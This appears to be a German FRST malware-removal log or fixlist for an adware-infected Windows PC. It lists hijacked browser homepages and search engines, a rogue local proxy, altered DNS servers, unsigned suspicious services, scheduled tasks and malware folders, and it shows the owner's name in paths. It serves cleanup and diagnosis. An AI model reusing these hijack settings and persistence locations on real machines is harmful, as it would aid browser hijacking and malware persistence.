ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Nick Schuster\AppData\Local\MEGAsync\ShellExtX32.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll -> Keine Datei
Startup: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.exe [2017-06-05] ()
BootExecute: autocheck autochk * sh4native Sh4Removal
GroupPolicy: Beschr鋘kung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschr鋘kung <======= ACHTUNG
ProxyEnable: [.DEFAULT] => Proxy ist aktiviert.
ProxyServer: [.DEFAULT] => 127.0.0.1:8003
ProxyEnable: [S-1-5-19] => Proxy ist aktiviert.
ProxyServer: [S-1-5-19] => 127.0.0.1:8003
ProxyEnable: [S-1-5-20] => Proxy ist aktiviert.
ProxyServer: [S-1-5-20] => 127.0.0.1:8003
ProxyServer: [S-1-5-21-3847841184-804715454-2304624315-1001] => 127.0.0.1:8003
Tcpip\Parameters: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{04A2521B-7C11-484A-B28D-E9BE3102A821}: [DhcpNameServer] 82.163.143.176
Tcpip\..\Interfaces\{9BAF9E4B-D963-4721-8C85-586F3F37FF3C}: [NameServer] 8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1
Tcpip\..\Interfaces\{C085ED3F-9016-49ED-8EF6-3F93AD892C71}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{C085ED3F-9016-49ED-8EF6-3F93AD892C71}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{E0DF352E-2385-4F61-8BE1-15E2F9F0520E}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{E0DF352E-2385-4F61-8BE1-15E2F9F0520E}: [DhcpNameServer] 82.163.143.157
ManualProxies: 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschr鋘kung <======= ACHTUNG
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschr鋘kung <======= ACHTUNG
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1490098796&z=edb8deb4a39db277332a2ebg6z4t7e1e3t2bdm2b1z&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://de.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_ir_17_18&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dde%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0FyCtDyCyCzyyE0FyB0EzytCyByD0DtDtN0D0Tzu0StCzyyDtAtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyBtCtBzztByEtCtGyCyB0DtCtG0C0B0DtCtGyE0E0DyCtGtCyEyBzzyD0CzzzytD0CyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0C0DtD0D0B0CyDtGzyyC0E0FtGyEtDyEyDtG0BzztCzztG0FtBtDyCtDzy0FtCzztDzz0E2QtN0A0LzuyE%26cr%3D1366659074%26a%3Dwbf_ir_17_18%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://de.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_ir_17_18&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dde%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0FyCtDyCyCzyyE0FyB0EzytCyByD0DtDtN0D0Tzu0StCzyyDtAtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyBtCtBzztByEtCtGyCyB0DtCtG0C0B0DtCtGyE0E0DyCtGtCyEyBzzyD0CzzzytD0CyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0C0DtD0D0B0CyDtGzyyC0E0FtGyEtDyEyDtG0BzztCzztG0FtBtDyCtDzy0FtCzztDzz0E2QtN0A0LzuyE%26cr%3D1366659074%26a%3Dwbf_ir_17_18%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKLM -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxps://de.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_ir_17_18&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dde%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0FyCtDyCyCzyyE0FyB0EzytCyByD0DtDtN0D0Tzu0StCzyyDtAtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyBtCtBzztByEtCtGyCyB0DtCtG0C0B0DtCtGyE0E0DyCtGtCyEyBzzyD0CzzzytD0CyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0C0DtD0D0B0CyDtGzyyC0E0FtGyEtDyEyDtG0BzztCzztG0FtBtDyCtDzy0FtCzztDzz0E2QtN0A0LzuyE%26cr%3D1366659074%26a%3Dwbf_ir_17_18%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM-x32 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491385150&z=2a9afdb9de70e14a8bc3025g3z1t6gac5bfwbg8gcw&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxps://de.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_ir_17_18&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dde%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0FyCtDyCyCzyyE0FyB0EzytCyByD0DtDtN0D0Tzu0StCzyyDtAtN1L2XzutAtFtBzytFtAtFyByDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyBtCtBzztByEtCtGyCyB0DtCtG0C0B0DtCtGyE0E0DyCtGtCyEyBzzyD0CzzzytD0CyD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StC0C0DtD0D0B0CyDtGzyyC0E0FtGyEtDyEyDtG0BzztCzztG0FtBtDyCtDzy0FtCzztDzz0E2QtN0A0LzuyE%26cr%3D1366659074%26a%3Dwbf_ir_17_18%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3847841184-804715454-2304624315-1001 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = 
C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\naweriweentcofise
FF NewTab: Mozilla\Firefox\Profiles\ajsmomju.default -> hxxp://www.initialsite123.com/?z=f1b5038898decb600b47077g1z9tfqae8b9m2tfz7w&from=icb&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&type=hp
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ajsmomju.default -> initialsite123
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ajsmomju.default -> initialsite123
FF Homepage: Mozilla\Firefox\Profiles\ajsmomju.default -> hxxp://www.ourluckysites.com/?type=hp&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
FF Keyword.URL: Mozilla\Firefox\Profiles\ajsmomju.default -> user_pref("keyword.URL", true);
FF SearchPlugin: C:\Users\Nick Schuster\AppData\Roaming\Mozilla\Firefox\Profiles\ajsmomju.default\searchplugins\ourluckysites.xml [2017-05-31]
FF NewTab: Firefox\Firefox\Profiles\5f8d7llm.default -> hxxp://www.trotux.com/?z=d9e5c212f42caf02cf9f950g4zab0tcmae1g4b0g2e&from=isr&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX&type=hp
FF SelectedSearchEngine: Firefox\Firefox\Profiles\5f8d7llm.default -> trotux
FF Extension: (SimilarWeb) - C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-03-28] [ist nicht signiert]
FF Extension: (HSearch) - C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-17] [ist nicht signiert]
FF Extension: (FF Adr) - C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-03-28] [ist nicht signiert]
FF SearchPlugin: C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\searchplugins\6ddy6fjk.xml [2017-03-17]
FF SearchPlugin: C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\searchplugins\startpageing123.xml [2017-03-21]
FF SearchPlugin: C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\searchplugins\startsearch.xml [2017-05-31]
StartMenuInternet: FIREFOX.EXE - C:\Program Files\Mozilla Firefox\firefox.exe hxxp://www.ourluckysites.com/?type=sc&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bpegkgagfojjbcpkihigfmkojdmmimdf] - <kein Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [ehgldbbpchgpcfagfpfjgoomddhccfgh] - <kein Path/update_url>
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1496220549&z=f72a668514478351723213eg2zet8qfo9ode2w5zae&from=che0812&uid=HGSTXHTS721010A9E630_JR10206P1V048M1V048MX
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Everness\Application\chrome.exe <==== ACHTUNG
C:\Program Files (x86)\Everness
S4 AppleAppSvc; C:\ProgramData\Apple\Temp\upgrade.ini:ad [199682 ] () [Datei ist nicht signiert] <==== ACHTUNG
C:\ProgramData\Apple\Temp\upgrade.ini
S4 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [108544 2017-04-26] () [Datei ist nicht signiert]
C:\ProgramData\Apple\Common\Cloud\WinHelper.dll
R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-06-01] (TODO: <公司名>) [Datei ist nicht signiert] <==== ACHTUNG
C:\ProgramData\BIT
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [101528 2017-05-31] () <==== ACHTUNG
C:\Program Files (x86)\Firefox
S2 MCSvc; C:\Windows\System32\svchost.exe [38792 2014-11-21] (Microsoft Corporation) <==== ACHTUNG (ServiceDLL nicht gefunden)
S2 MCSvc; C:\Windows\SysWOW64\svchost.exe [33088 2014-11-21] (Microsoft Corporation) <==== ACHTUNG (ServiceDLL nicht gefunden)
R2 MVCSrv; C:\ProgramData\Package Cache\{2A002F88-FD5D-379B-A350-A25D84AF128B}v14.0.25420\packages\VisualC_D14\VC_IDE.Base\VC_IDE_Base.dll [105984 2017-03-28] () [Datei ist nicht signiert]
C:\ProgramData\Package Cache\{2A002F88-FD5D-379B-A350-A25D84AF128B}v14.0.25420\packages\VisualC_D14\VC_IDE.Base\VC_IDE_Base.dll
S4 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (Gold Click Ltd) <==== ACHTUNG
C:\Program Files (x86)\ProxyGate
S2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [665768 2016-11-16] (Enigma Software Group USA, LLC.)
C:\Program Files\Enigma Software Group
S4 srcsrv; C:\Windows\src_srv\winsrcsrv.exe [17920 2017-05-29] () [Datei ist nicht signiert]
C:\Windows\src_srv\winsrcsrv.exe
Folder: C:\Windows\src_srv
S4 SysLinkMapper; C:\ProgramData\F5C6DBD2-9E35-457F-B662-CF7D478FD412\winnetsvces.exe [9216 2017-04-18] () [Datei ist nicht signiert]
C:\ProgramData\F5C6DBD2-9E35-457F-B662-CF7D478FD412
R2 WinSAPSvc; C:\Users\Nick Schuster\AppData\Roaming\WinSAPSvc\WinSAP.dll [1886720 2017-06-01] () [Datei ist nicht signiert] <==== ACHTUNG
C:\Users\Nick Schuster\AppData\Roaming\WinSAPSvc
S2 ZbezjService; C:\Windows\SysWOW64\srvany.exe [8192 2003-04-18] () [Datei ist nicht signiert]
S2 3DM; C:\Users\Nick Schuster\AppData\Local\3DM\Kitty.dll [X] <==== ACHTUNG
C:\Users\Nick Schuster\AppData\Local\3DM
S4 Kitty; C:\Users\Nick Schuster\AppData\Local\Kitty\Kitty.dll [X] <==== ACHTUNG
C:\Users\Nick Schuster\AppData\Local\Kitty
S2 kivojebi; C:\Program Files (x86)\0D8F6370-1479488272-81E4-3884-0071C2420BD3\kns20F0.tmp [X]
C:\Program Files (x86)\0D8F6370-1479488272-81E4-3884-0071C2420BD3
S4 Recover; C:\Program Files\Uninstall Information\FHND4RB6YGFG69477PK1CJU4XT48RPI\Odgt'YA#3N.exe [X]
C:\Program Files\Uninstall Information\FHND4RB6YGFG69477PK1CJU4XT48RPI
S3 esgiguard; C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [16432 2016-11-16] (Enigma Software Group USA, LLC.)
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2016-11-23] ()
C:\Windows\System32\DRIVERS\EsgScanner.sys
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== ACHTUNG
C:\Program Files (x86)\Elex-tech
2017-06-03 18:05 - 2017-06-03 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-4f25-0
2017-06-03 18:05 - 2017-06-03 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3735-1
Folder: C:\Users\Nick Schuster\AppData\Roaming\NetCtl
2017-06-02 18:05 - 2017-06-02 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-6921-1
2017-06-02 18:05 - 2017-06-02 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-2583-0
2017-06-02 18:05 - 2017-06-02 18:05 - 00000000 ____D C:\ProgramData\{279BD4C5-9030-636E-34A5-319E03364EE3}
2017-06-01 19:22 - 2017-06-01 19:22 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Applemy
2017-06-01 18:05 - 2017-06-01 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-7817-0
2017-06-01 18:05 - 2017-06-01 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3a25-1
2017-06-01 12:05 - 2017-06-01 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-0b25-1
2017-06-01 12:05 - 2017-06-01 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-07f7-0
2017-06-01 12:00 - 2017-06-01 12:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\glory
2017-06-01 00:19 - 2017-06-01 00:19 - 00001996 _____ C:\Windows\System32\Tasks\fyKiuMkkXh
2017-06-01 00:14 - 2017-06-01 00:19 - 00000002 _____ C:\END
2017-05-31 18:05 - 2017-05-31 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-7411-1
2017-05-31 18:05 - 2017-05-31 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-49f5-0
2017-05-31 13:53 - 2017-05-31 13:53 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Applemy
2017-05-31 13:52 - 2017-05-31 13:52 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-31 13:52 - 2017-05-31 13:52 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-05-31 13:46 - 2017-05-31 13:48 - 00000000 ____D C:\Program Files (x86)\Applemy
2017-05-31 12:18 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{5dc62cb3-512c-0}
2017-05-31 12:18 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{241B54D7-93B0-E37C-7209-B5C3B4A67434}
2017-05-31 12:18 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{1fc205d4-012c-1}
2017-05-31 12:05 - 2017-05-31 12:05 - 00023496 _____ C:\Windows\System32\Tasks\{0B047F47-0F0A-0408-0B11-087F0C0B110F}
2017-05-31 11:38 - 2017-05-31 11:38 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Obsidium
2017-05-31 11:36 - 2017-05-31 11:36 - 00000000 ____D C:\ProgramData\F5C6DBD2-9E35-457F-B662-CF7D478FD412
2017-05-31 11:22 - 2017-05-31 11:22 - 00023032 _____ (Wiper Software) C:\Windows\system32\wiperrm.exe
2017-05-31 11:22 - 2017-05-31 11:22 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\WiperSoft
2017-05-31 11:22 - 2017-05-31 11:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WiperSoft
2017-05-30 19:49 - 2017-05-30 19:51 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\{12A8CCFE-3C33-4995-BAD8-074E4C5B22FD}
2017-05-30 13:59 - 2017-05-30 13:59 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Minerent
2017-05-30 13:58 - 2017-06-01 12:00 - 00000000 ____D C:\Program Files (x86)\Arucerther_
2017-05-30 13:58 - 2017-05-30 13:58 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
2017-05-30 13:58 - 2017-05-30 13:58 - 00000000 ____D C:\Users\Default User\AppData\Local\AdvinstAnalytics
2017-05-30 13:56 - 2017-05-30 16:14 - 00000000 ____D C:\Users\Default\AppData\Roaming\Minerent
2017-05-30 13:56 - 2017-05-30 16:14 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Minerent
2017-05-30 13:56 - 2017-05-30 16:14 - 00000000 ____D C:\Program Files (x86)\Arucerther
2017-05-30 13:56 - 2017-05-30 13:56 - 00006006 _____ C:\Windows\System32\Tasks\Coobeck Monitor
2017-05-30 13:56 - 2017-05-30 13:56 - 00000000 ____D C:\Users\Default\AppData\Local\Cerzaentfisuge
2017-05-30 13:56 - 2017-05-30 13:56 - 00000000 ____D C:\Users\Default User\AppData\Local\Cerzaentfisuge
2017-05-30 13:55 - 2017-05-30 13:55 - 00000000 ____D C:\ProgramData\e9cf343f516c47a4a7255147ad1dcd13
2017-05-30 13:55 - 2017-05-30 13:55 - 00000000 ____D C:\ProgramData\ddef39d292cf4b8ea43c256f14555ff3
2017-05-29 22:02 - 2017-05-29 22:02 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\FBTime
2017-05-29 22:01 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\943973b1-7343-1
2017-05-29 22:01 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\943973b1-6925-0
2017-05-29 22:01 - 2017-05-29 22:01 - 00003034 _____ C:\Windows\System32\Tasks\ttwifi
2017-05-29 22:00 - 2017-05-29 22:02 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\AppTrailers
2017-05-29 22:00 - 2017-05-29 22:01 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\gplyra
2017-05-29 22:00 - 2017-05-29 22:01 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\gjtj1a4xugf
2017-05-29 22:00 - 2017-05-29 22:00 - 00016764 _____ C:\Windows\System32\Tasks\Quick Tharks Screen Saver
2017-05-29 22:00 - 2017-05-29 22:00 - 00003686 _____ C:\Windows\System32\Tasks\SoftUpgrade
2017-05-29 22:00 - 2017-05-29 22:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\devnull
2017-05-29 22:00 - 2017-05-29 22:00 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\AdvinstAnalytics
2017-05-29 22:00 - 2017-05-29 22:00 - 00000000 ____D C:\Program Files (x86)\SoftUpgrade
2017-05-29 21:59 - 2017-06-02 15:32 - 00003020 _____ C:\Windows\System32\Tasks\RunAtStartup
2017-05-29 21:59 - 2017-06-01 11:54 - 00000231 _____ C:\ServiceLog.txt
2017-05-29 21:59 - 2017-05-29 22:03 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Grerdaentlerveck
2017-05-29 21:59 - 2017-05-29 22:01 - 00000000 ____D C:\Windows\src_srv
2017-05-29 21:59 - 2017-05-29 22:01 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\yxuuo1zrzz4
2017-05-29 21:59 - 2017-05-29 22:00 - 00000000 ____D C:\Program Files (x86)\ProxyGate
2017-05-29 21:59 - 2017-05-29 21:59 - 00006038 _____ C:\Windows\System32\Tasks\Gerfety Renew
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\s0ac4g0fkg0
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Draveingplererward
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\ProgramData\VideoMemoryDiagnostic
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\Program Files (x86)\Prfasaretaly
2017-05-29 21:59 - 2017-05-29 21:59 - 00000000 ____D C:\Program Files (x86)\pccleanplus
2017-05-26 21:30 - 2017-05-26 21:30 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Babylon
2017-05-26 21:30 - 2017-05-26 21:30 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Babylon
2017-05-26 21:30 - 2017-05-26 21:30 - 00000000 ____D C:\ProgramData\Babylon
2017-05-26 09:40 - 2017-05-31 13:45 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\terana
2017-05-18 17:00 - 2017-05-22 17:09 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\CSHMDR
2017-05-15 16:30 - 2017-05-17 14:09 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\CWASRE
2017-05-15 00:05 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\f9d60eee-68a5-1
2017-05-15 00:05 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\f9d60eee-5f71-0
2017-05-14 16:16 - 2017-05-23 15:34 - 00000000 _____ C:\Windows\SysWOW64\1
2017-05-14 12:05 - 2017-05-14 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-4cc1-0
2017-05-14 12:05 - 2017-05-14 12:05 - 00000000 ____D C:\ProgramData\f9d60eee-4593-1
2017-05-13 20:17 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{1aa64fd2-712c-1}
2017-05-13 20:17 - 2017-05-31 12:18 - 00000000 ____D C:\ProgramData\{02a407e1-212c-0}
2017-05-12 18:05 - 2017-05-12 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-5ad5-1
2017-05-12 18:05 - 2017-05-12 18:05 - 00000000 ____D C:\ProgramData\f9d60eee-3ae5-0
